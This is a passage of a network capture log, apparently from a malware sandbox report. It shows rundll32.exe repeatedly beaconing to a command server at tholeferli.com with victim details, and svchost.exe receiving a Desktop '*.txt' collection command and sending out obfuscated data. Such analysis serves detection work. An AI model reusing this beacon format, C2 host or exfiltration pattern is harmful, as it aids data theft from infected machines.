                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:39.373692989 CEST370INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:39 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZQJAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                68192.168.2.2249235194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:39.651362896 CEST371OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:39.809314013 CEST372INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:39 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVZAEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                69192.168.2.2249236194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:40.088572979 CEST372OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:40.245002031 CEST373INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZBYAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                795.213.179.6780192.168.2.2249173C:\Windows\SysWOW64\svchost.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:06.655970097 CEST296INData Raw: 00 27 00 00 00 01 00 00 00 15 25 75 73 65 72 70 72 6f 66 69 6c 65 25 5c 44 65 73 6b 74 6f 70 00 00 00 05 2a 2e 74 78 74 05
                                                Data Ascii: '%userprofile%\Desktop*.txt
                                                Jul 22, 2021 16:11:06.656426907 CEST296OUTData Raw: 0c 00 0f 0a 0b 0a 0b 0a
                                                Data Ascii:
                                                Jul 22, 2021 16:11:06.656562090 CEST296OUTData Raw: 00 00 00 14 09 0a 0a 0a 1a 7a 65 79
                                                Data Ascii: zey
                                                Jul 22, 2021 16:11:06.656682014 CEST296OUTData Raw: 7a 7c 63 79 63 79 24 69 65 67 30 32 3a
                                                Data Ascii: z|cycy$ieg02:
                                                Jul 22, 2021 16:11:06.656800985 CEST296OUTData Raw: 00 00 00 0e 0b 0a 0a 0a 00
                                                Data Ascii:
                                                Jul 22, 2021 16:11:06.656919003 CEST296OUTData Raw: 32 3e 24 3b 3d 24 3f 38 24 32
                                                Data Ascii: 2>$;=$?8$2
                                                Jul 22, 2021 16:11:06.657737970 CEST296OUTData Raw: 00 00 00 28 07 0a 0a 0a 2e 6f 6b 32 3c 3a 6f 3d 6b 27 6b 32 3d 6c
                                                Data Ascii: (.ok2<:o=k'k2=l
                                                Jul 22, 2021 16:11:06.657861948 CEST297OUTData Raw: 27 3e 6b 32 32 27 33 38 6f 6c 27 39 32 6c 3d 3e 3e 3e 3f 32 3b 3d 3b
                                                Data Ascii: '>k22'38ol'92l=>>>?2;=;
                                                Jul 22, 2021 16:11:07.149967909 CEST299OUTData Raw: 00 00 03 a6 00 0a 0a 0a 36 49 30 56 5f 79 6f 78 79 56 4b 66 68 7f 79 56 4b 7a 7a 4e 6b 7e 6b 56 46 65 69 6b 66 56 4d 65 65 6d 66 6f 56 49 62 78 65 67 6f 56 5f 79 6f 78 2a 4e 6b 7e 6b 56 4e 6f 6c 6b 7f 66 7e 0a 0a 0a 0c 0a 0a 0a 01 24 6d 65 65 6d
                                                Data Ascii: 6I0V_yoxyVKfhyVKzzNk~kVFeikfVMeemfoVIbxegoV_yox*Nk~kVNolkf~$meemfo$ieg;ZU@KX%UKn8:8:':='89';;$meemfo$iegIMCI%iegzfo~o%yokxibj/Cdr:PRb:F8b:h]}ySRH}hMf`SRXzh8>|oMb:h]}xoM;yFML}iMrzS8L:
                                                Jul 22, 2021 16:11:07.150005102 CEST299OUTData Raw: 7e 72 5a 5e 4b 7f 45 59 72 7a 68 5d 4c 64 50 59 33 39 50 5d 40 7d 46 4d 66 7e 53 5d 6e 66 46 38 4c 7d 68 67 69 79 41 63 32 7b 45 39 4f 33 47 49 3e 3e 46 4d 4c 7d 69 4d 72 7a 53 38 4c 3a 6b 5d 33 7f 46 39 44 7a 50 38 3f 66 50 49 3b 66 6f 4d 44 65
                                                Data Ascii: ~rZ^KEYrzh]LdPY39P]@}FMf~S]nfF8L}hgiyAc2{E9O3GI>>FML}iMrzS8L:k]3F9DzP8?fPI;foMDeS]?dP^~8Z]CpE9O3GI>?$meemfo$iegIEDYOD^%us]Z$8239<?}}}$meemfo$iegN\%U8%eUziaNDN9_bOI`LhZz;LAI99Y'9D?ls{dGsA[HHb}[K
                                                Jul 22, 2021 16:11:07.150973082 CEST299OUTData Raw: 00 00 00 04
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                70192.168.2.2249237194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:40.532183886 CEST373OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:40.698662996 CEST374INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:40 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKAZPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                71192.168.2.2249238194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:40.971543074 CEST375OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:41.145374060 CEST375INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHNMSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                72192.168.2.2249239194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:41.434386015 CEST376OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:41.603351116 CEST376INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 59 42 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYYBBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                73192.168.2.2249240194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:41.904114008 CEST377OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:42.072706938 CEST377INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:41 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFFUUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                74192.168.2.2249241194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:42.361474991 CEST378OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:42.517798901 CEST378INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHGTSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                75192.168.2.2249242194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:42.800192118 CEST379OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:42.956759930 CEST379INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:42 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGMNTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                76192.168.2.2249243194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:43.257241011 CEST380OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:43.413952112 CEST381INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVTGEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                77192.168.2.2249244194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:43.688730955 CEST381OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:43.848915100 CEST382INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 56 45 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKVEPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                78192.168.2.2249245194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:44.126646996 CEST382OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:44.293515921 CEST383INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:44 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 46 55 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMFUNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                79192.168.2.2249246194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:44.601757050 CEST384OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:44.768727064 CEST384INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:44 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFCXUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.2249175194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:06.971990108 CEST298OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:07.127315044 CEST298INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZKPAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                80192.168.2.2249247194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:45.055797100 CEST385OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:45.212450981 CEST385INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJAZQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                81192.168.2.2249248194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:45.490674019 CEST386OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:45.650993109 CEST386INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:45 GMT
                                                Content-Type: text/html
